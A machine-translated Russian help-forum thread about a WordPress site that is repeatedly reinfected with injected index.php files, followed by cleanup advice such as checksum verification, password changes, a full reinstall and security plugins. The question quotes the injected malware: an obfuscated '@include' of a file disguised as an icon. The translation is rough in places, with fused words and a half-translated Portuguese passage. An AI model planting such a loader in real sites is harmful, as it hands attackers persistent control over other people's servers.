Сайт Wordpress постоянно внедряется с файлами index.php

Question

В течение последних 6 дней я обнаруживал файлы index.php по всей моей установке Wordpress со следующими строками кода и аналогичными.

/*371bd*/

@include "\057hom\145/tm\142m20\0616/p\165bli\143_ht\155l/V\151deo\163/ba\143kwp\165p-9\0622c4\070-te\155p/a\0622e4\143b96\1468d0\066a49\145521\143cfa\066881\146fe/\0568c7\1453c7\067.ic\157";

/*371bd*/

Каждый день я полностью удаляю все файлы index.php с помощьюЯ делаю сканирование, и я также использую Wordfence, чтобы найти вредоносный код и удалить его.

После очистки я возвращаюсь на следующий день, и все возвращается!Как мне остановить это раз и навсегда?

Answer 1

Сегодня я воскресил два сайта, которые были отключены от сети UBH (вредоносная программа United Bangladeshi Hackers).Это была не очень простая задача, требующая знаний командной строки.

Сначала проверьте согласованность основных файлов Wordpress, поэтому подойдет инструмент wp-cli .

Выполнитькоманда:

wp core verify-checksums --allow-root

Результат

Success: WordPress installation verifies against checksums.

[PT-BR] Hoje eu ressucitei dois сайты que estavam в автономном режиме infectados com UBH. Não foi uma tarefa bem simples e Requer conhecimentos de linha de comando.

Принципиальная схема подтверждения правильных действий до нуля Wordpress a ferramenta wp-cli foi o caminho.

Rode o comando:

wp core verify-checksums --allow-root

O resultado

Success: WordPress installation verifies against checksums.

Answer 2

Ваш сайт был взломан - это типичная атака для слабых веб-сайтов Wordpress.

Прежде всего:

НЕ используйте «бесплатные» платные темы, которые вы скачиваете без надписей.веб-сайты.Либо используйте настоящую бесплатную тему со страницы тем Wordpress, либо заплатите за настоящую премиум-тему от известного производителя.

НЕ используйте «бесплатные» платные плагины, которые вы скачиваете со схематичных веб-сайтов.Либо используйте законный плагин, либо заплатите за премиальный от известного производителя.

Как остановить его раз и навсегда?

1) Если вы используете «бесплатный»'(платная) тема с какого-то хитрого сайта, просто не надо.Как правило, они содержат задние двери для инъекций, такие как эта.

Либо используйте законную бесплатную тему, либо платите за премиальную.

2) Измените свои пароли с электронной почты до веб-хостинга.Это включает в себя вашу cPanel и FTP, если вы используете это.

3) Полностью Сотрите ВСЕ файлы из папки server / public_html - начните заново.

4) Удалитьвсе базы данных MySQL.

4) Переустановите Wordpress, используя легитимную тему, и убедитесь, что вы не используете «admin» или «administrator» в качестве имени пользователя, установите для него другое значение и установите надежный пароль.

5) После полной переустановки используйте плагин безопасности, такой как WP Cerber (отличный плагин), и измените URL-адрес для входа по умолчанию с /wp-login на какой-то пользовательский (WP Cerber имеет эту функцию)

6) Не используйте никакие имена пользователей и пароли, которые вы использовали ранее для чего-либо.Здесь вам может пригодиться менеджер паролей, например LastPass, который будет генерировать и запоминать для вас очень надежные пароли.

7) Дополнительный шаг: если вы знакомы с командной строкой, используйте WP Scan для тестирования вашего веб-сайта.против уязвимостей.Это инструмент разработки, предназначенный именно для этого ... Убедитесь, что вы используете только против своих собственных сайтов, хотя он по сути ищет способы «проникнуть» и скомпрометировать сайт и не может быть строго законным делать это по желанию против других людей.веб-сайты.